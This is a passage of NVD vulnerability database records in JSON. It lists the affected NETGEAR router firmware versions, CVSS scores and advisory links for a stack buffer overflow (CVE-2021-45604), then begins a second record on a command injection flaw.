"matchCriteriaId": "888A8E0F-93DD-436D-B00C-F469C3BD6E5B",
"versionEndExcluding": "1.0.0.102",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7D30939B-86E3-4C78-9B05-686B4994C8B9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "160F53B0-8430-4D85-8ABC-0A64B27DDFBD",
"versionEndExcluding": "1.0.3.60",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "814A0114-9A1D-4EA0-9AF4-6968514E4F01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:lax20_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "48709EA4-81F3-4CF1-B9A8-5379309914B0",
"versionEndExcluding": "1.1.6.28",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:lax20:-:*:*:*:*:*:*:*",
"matchCriteriaId": "491CEB8D-22F3-4F86-96F0-03C5C58BA295",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:mk62_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AE40C2D0-0863-4E0F-B3E7-6FD043B46467",
"versionEndExcluding": "1.0.6.116",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:mk62:-:*:*:*:*:*:*:*",
"matchCriteriaId": "69A79475-37BE-47BD-A629-DCEF22500B0B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:mr60_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EA438541-75AE-4D6B-AB56-02760D08D465",
"versionEndExcluding": "1.0.6.116",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:mr60:-:*:*:*:*:*:*:*",
"matchCriteriaId": "65BB3ECD-2F0B-4625-A1DB-F6CEFC46E277",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ms60_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2234C485-F411-48CC-9A0B-AA49B6961E38",
"versionEndExcluding": "1.0.6.116",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ms60:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F003F064-591C-4D7C-9EC4-D0E553BC6683",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "685E2CA4-AA89-4574-8DB1-7C06D9F0FF2D",
"versionEndExcluding": "1.0.4.50",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "930E739E-EFDC-49AB-9155-A71C2B25FCD6",
"versionEndExcluding": "1.0.1.68",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "87F3EAAB-C4C2-47BA-B87A-3CFF0C52EF21",
"versionEndExcluding": "1.0.4.118",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "52AE9AD2-BC8D-477D-A3D3-891AE52FA5F3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "57A029C8-4DE3-4393-BD61-E9562C4E17D8",
"versionEndExcluding": "1.0.4.118",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "5A09A9E8-8C77-4EDB-9483-B3C540EF083A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "94795476-184B-4E7D-9D8B-ECB45609108E",
"versionEndExcluding": "1.3.3.140",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D9F1DAD0-F8B8-48D5-B571-C55636B274C3",
"versionEndExcluding": "1.0.11.116",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C3A7E8BF-8CC3-4806-89F5-FBE01A36A1FD",
"versionEndExcluding": "1.3.3.140",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7850_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EF7A1DF8-E9A0-4312-AC37-DEB46E37EE50",
"versionEndExcluding": "1.0.5.68",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7850:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DAF94D73-B6D0-4334-9A41-83AA92B7C6DF",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "96390A31-03B8-477B-8710-F797CB44E741",
"versionEndExcluding": "1.0.4.38",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EA344C08-94F1-47F8-9607-3D854B890E19",
"versionEndExcluding": "1.4.2.84",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3D6A70D-66AF-4064-9F1B-4358D4B1F016",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7960p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "33B2293C-09AD-4B5A-B2A0-923E2B9923AA",
"versionEndExcluding": "1.4.2.84",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7960p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "091CEDB5-0069-4253-86D8-B9FE17CB9F24",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D10E41DC-982F-444A-9A4D-82EC2BA64199",
"versionEndExcluding": "1.0.4.68",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4905D866-2326-487F-AAA5-96ABA0DBD56E",
"versionEndExcluding": "1.4.2.84",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F7EF872D-2537-4FEB-8799-499FC9D44339",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rax15_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2268D5EF-E7FA-4112-A468-507417E18FFF",
"versionEndExcluding": "1.0.3.96",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rax15:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B624B4D3-BCF4-4F95-B401-A88BEC3145A5",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rax20_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "31289572-2197-4A38-8353-CA4AAD491160",
"versionEndExcluding": "1.0.3.96",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rax20:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7038703C-C79D-4DD4-8B16-E1A5FC6694C0",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rax200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6334DE4D-E78B-4582-9C6F-6123DA5192C7",
"versionEndExcluding": "1.0.4.120",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rax200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "58EB0F2F-FB5C-47D9-9AE6-087AE517B3F9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rax35_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "255508E6-628A-4C83-BA39-90C9D05197B7",
"versionEndExcluding": "1.0.3.96",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rax35:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "972BB714-8869-42C6-95F6-2C15AFA65716",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rax40_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "68163CF2-4781-4B87-8E39-62B4DF82A44A",
"versionEndExcluding": "1.0.3.96",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rax40:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "DD5F8B3F-C0D0-496C-A235-A467EA578C28",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rax43_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8AC89EAA-344C-438E-A5A5-2C34CF699743",
"versionEndExcluding": "1.0.3.96",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rax43:-:*:*:*:*:*:*:*",
"matchCriteriaId": "178BB386-F66C-4CE8-9283-37D22B304691",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rax45_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0706367A-3F60-4564-8689-E0A46DDC31C2",
"versionEndExcluding": "1.0.3.96",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rax45:-:*:*:*:*:*:*:*",
"matchCriteriaId": "4B08BD69-CDCC-4CEB-B887-4E47D2B45D26",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rax50_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "679C4EC5-D17E-469B-A28F-BF5E231CED3D",
"versionEndExcluding": "1.0.3.96",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rax50:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C430976E-24C0-4EA7-BF54-F9C188AB9C01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rax75_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BDF9F3BA-4239-4F4D-A65E-A6752A5420F6",
"versionEndExcluding": "1.0.4.120",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rax75:-:*:*:*:*:*:*:*",
"matchCriteriaId": "1BAA74D7-36A1-4494-96A2-BD0D2D6BF22F",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rax80_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "334BB384-5C29-4D24-9F82-B8EE8D0CA8BF",
"versionEndExcluding": "1.0.4.120",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rax80:-:*:*:*:*:*:*:*",
"matchCriteriaId": "06B5A85C-3588-4263-B9AD-4E56D3F6CB16",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rbk752_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D8D90FF3-F5CE-43DF-ACF7-C64DBDCCA185",
"versionEndExcluding": "3.2.17.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rbk752:-:*:*:*:*:*:*:*",
"matchCriteriaId": "A45832BD-114D-42F1-B9F1-7532496D30A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rbk852_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "845C1FCC-F54B-452A-B121-1CD1A7867027",
"versionEndExcluding": "3.2.17.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rbk852:-:*:*:*:*:*:*:*",
"matchCriteriaId": "14F257FE-31CE-4F74-829D-29407D74ADF7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rbr750_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B6AE1767-9D9A-4E9E-B088-6727FACFDE5C",
"versionEndExcluding": "3.2.17.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rbr750:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C13F5C69-FA9B-472A-9036-0C2967BDCDE9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rbr850_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "01E0EF50-145F-407A-8915-4EFFCD833505",
"versionEndExcluding": "3.2.17.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rbr850:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D92E4C8E-222A-476C-8273-F7171FC61F0B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rbs750_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F614A1AB-F0C0-45D7-8D91-ECA3C1AA9165",
"versionEndExcluding": "3.2.17.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rbs750:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B529194C-C440-4BC3-850F-0613FC548F86",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rbs850_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0DC5A075-0619-409C-B057-41015B8C54B3",
"versionEndExcluding": "3.2.17.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rbs850:-:*:*:*:*:*:*:*",
"matchCriteriaId": "221CA950-E984-44CD-9E1B-3AADE3CEBE52",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rs400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "95AF0FA9-F2C5-4D84-BF37-AA8CB6EC3C4A",
"versionEndExcluding": "1.5.1.80",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rs400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "2700644E-0940-4D05-B3CA-904D91739E58",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:xr1000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F615F516-29EF-4C15-9E18-C5D4F6291A38",
"versionEndExcluding": "1.0.0.58",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:xr1000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "4FD4ED11-4130-47DA-8A9D-55B8F6E3E213",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects CBR750 before 3.2.18.2, D6220 before 1.0.0.68, D6400 before 1.0.0.102, D8500 before 1.0.3.60, LAX20 before 1.1.6.28, MK62 before 1.0.6.116, MR60 before 1.0.6.116, MS60 before 1.0.6.116, R6300v2 before 1.0.4.50, R6400 before 1.0.1.68, R6400v2 before 1.0.4.118, R6700v3 before 1.0.4.118, R6900P before 1.3.3.140, R7000 before 1.0.11.116, R7000P before 1.3.3.140, R7850 before 1.0.5.68, R7900 before 1.0.4.38, R7900P before 1.4.2.84, R7960P before 1.4.2.84, R8000 before 1.0.4.68, R8000P before 1.4.2.84, RAX15 before 1.0.3.96, RAX20 before 1.0.3.96, RAX200 before 1.0.4.120, RAX35v2 before 1.0.3.96, RAX40v2 before 1.0.3.96, RAX43 before 1.0.3.96, RAX45 before 1.0.3.96, RAX50 before 1.0.3.96, RAX75 before 1.0.4.120, RAX80 before 1.0.4.120, RBK752 before 3.2.17.12, RBK852 before 3.2.17.12, RBR750 before 3.2.17.12, RBR850 before 3.2.17.12, RBS750 before 3.2.17.12, RBS850 before 3.2.17.12, RS400 before 1.5.1.80, and XR1000 before 1.0.0.58."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por un desbordamiento del b\u00fafer en la regi\u00f3n stack de la memoria por parte de un usuario autenticado. Esto afecta a CBR750 versiones anteriores a 3.2.18.2, D6220 versiones anteriores a 1.0.0.68, D6400 versiones anteriores a 1.0.0.102, D8500 versiones anteriores a 1.0.3.60, LAX20 versiones anteriores a 1.1.6.28, MK62 versiones anteriores a 1.0.6.116, MR60 versiones anteriores a 1.0.6.116, MS60 versiones anteriores a 1.0.6.116, R6300v2 versiones anteriores a 1.0.4.50, R6400 versiones anteriores a 1.0. 1.68, R6400v2 versiones anteriores a 1.0.4.118, R6700v3 versiones anteriores a 1.0.4.118, R6900P versiones anteriores a 1.3.3.140, R7000 versiones anteriores a 1.0.11.116, R7000P versiones anteriores a 1.3.3.140, R7850 versiones anteriores a 1.0.5.68, R7900 versiones anteriores a 1.0.4.38, R7900P versiones anteriores a 1.4.2.84, R7960P versiones anteriores a 1.4.2.84, R8000 versiones anteriores a 1. 0.4.68, R8000P versiones anteriores a 1.4.2.84, RAX15 versiones anteriores a 1.0.3.96, RAX20 versiones anteriores a 1.0.3.96, RAX200 versiones anteriores a 1.0.4.120, RAX35v2 versiones anteriores a 1.0.3.96, RAX40v2 versiones anteriores a 1.0.3.96, RAX43 versiones anteriores a 1.0.3.96, RAX45 versiones anteriores a 1.0.3.96, RAX50 versiones anteriores a 1.0.3.96, RAX75 versiones anteriores a 1. 0.4.120, RAX80 versiones anteriores a 1.0.4.120, RBK752 versiones anteriores a 3.2.17.12, RBK852 versiones anteriores a 3.2.17.12, RBR750 versiones anteriores a 3.2.17.12, RBR850 versiones anteriores a 3.2.17.12, RBS750 versiones anteriores a 3.2.17.12, RBS850 versiones anteriores a 3.2.17.12, RS400 versiones anteriores a 1.5.1.80 y XR1000 versiones anteriores a 1.0.0.58"
}
],
"id": "CVE-2021-45604",
"lastModified": "2024-11-21T06:32:38.723",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 2.7,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:A/AC:L/Au:S/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 5.1,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 4.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 0.9,
"impactScore": 3.6,
"source": "cve@mitre.org",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 4.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 0.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2021-12-26T01:15:17.900",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000064526/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-and-WiFi-Systems-PSV-2020-0572"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000064526/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-and-WiFi-Systems-PSV-2020-0572"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-787"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2021-12-26 01:15
Modified
2024-11-21 06:32
Severity ?
6.6 (Medium) - CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H
6.8 (Medium) - CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
6.8 (Medium) - CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Summary
Certain NETGEAR devices are affected by command injection by an authenticated user. This affects D3600 before 1.0.0.76, D6000 before 1.0.0.78, D6100 before 1.0.0.63, D6220 before 1.0.0.52, D6400 before 1.0.0.86, D7800 before 1.0.1.56, D8500 before 1.0.3.44, DGN2200Bv4 before 1.0.0.109, DGN2200v4 before 1.0.0.110, R6250 before 1.0.4.34, R6300v2 before 1.0.4.34, R6400 before 1.0.1.46, R6400v2 before 1.0.2.66, R6700 before 1.0.2.6, R6700v3 before 1.0.2.66, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R7000 before 1.0.9.42, R7000P before 1.3.1.64, R7100LG before 1.0.0.50, R7300 before 1.0.0.70, R7900 before 1.0.3.8, R7900P before 1.4.1.30, R8000 before 1.0.4.28, R8000P before 1.4.1.30, R8300 before 1.0.2.128, R8500 before 1.0.2.128, WNDR3400v3 before 1.0.1.24, WNR3500Lv2 before 1.2.0.62, and XR500 before 2.3.2.56.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d3600_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7BECFDEE-A795-43F1-9651-13096141B3BE",
"versionEndExcluding": "1.0.0.76",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d3600:-:*:*:*:*:*:*:*",
"matchCriteriaId": "31DE9D4E-3CDC-4552-A63F-DD5D95E23F63",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6000_firmware:*:*:*:*:*:*:*:*",
